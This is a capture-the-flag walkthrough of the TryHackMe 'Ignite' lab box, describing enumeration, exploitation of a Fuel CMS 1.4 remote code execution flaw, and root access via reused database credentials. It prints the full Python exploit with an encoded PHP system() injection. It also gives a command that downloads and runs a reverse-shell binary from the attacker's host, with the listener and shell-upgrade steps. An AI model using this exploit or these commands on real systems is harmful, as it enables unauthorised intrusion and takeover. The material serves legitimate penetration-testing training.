TryHackMe – Ignite Walkthrough
Introduction
This was a simple Linux machine that required to enumerate a web server and exploit a remote code execution vulnerability affecting Fuel CMS to gain initial access, and exposed clear-text database credentials to escalate privileges to root.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
The scan has only identified port 80 as open, so the next step will be to start enumerating HTTP.
Enumerating HTTP
When navigating to the site through a browser, it seems to be using Fuel CMS version 1.4:
Using SearchSploit to look for known vulnerabilities in this version of Fuel CMS:
There appears to be a remote code execution vulnerability. Mirroring the exploit:
When looking at the exploit code, it appears that commands are passed in the “filter” parameter of the /fuel/pages/select endpoint:
import requests
import urllib
url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
proxy = {"http":"http://127.0.0.1:8080"}
r = requests.get(burp0_url, proxies=proxy)
html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
print r.text[0:dup]It seems that by default it is configured to proxy the traffic generated from the exploit to tools like Burp, since in this case it isn’t required this can be commented. Also the “url” parameter needs to be amended to reflect the Fuel CMS instance:
Upon executing the exploit, it requires a command, which is then URL-encoded and passed as part of the “filter” argument in the request:
As shown in the screenshot above, this has granted remote code execution, although an interactive shell should be obtained to exploit the machine further.
The first step is to generate some shellcode using MSFvenom with the following flags:
- -p to specify the payload type, in this case, the Linux TCP reverse shell
- LHOST to specify the localhost IP address to connect to
- LPORT to specify the local port to connect to
- -f to specify the format for the shell, in this case, ELF
Setting up a Python Simple HTTP Server to host the shell:
The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
Upon executing the following command through the exploit used above, the reverse shell is downloaded and executed, granting access as the www-data user:
wget 10.4.36.186/shell -O /tmp/shell && chmod +x /tmp/shell && /tmp/shell
The following steps can be done to obtain an interactive shell:
- Running “python -c ‘import pty; pty.spawn(“/bin/sh”)’” on the victim host
- Hitting CTRL+Z to background the process and go back to the local host
- Running “stty raw -echo” on the local host
- Hitting “fg + ENTER” to go back to the reverse shell
Privilege Escalation
After gaining initial access to the machine, did a bit of research on where Fuel CMS stores database credentials:
Identified database credentials in the database.php file:
As it turns out, this was being used as the password for the root user on the machine:
root-levell access to the box has now been obtained.
Conclusion
This was definitely a beginner-level machine, but still quite fun to complete and would be ideal for someone who is starting their penetration testing journey and wants to begin learning basic techniques.
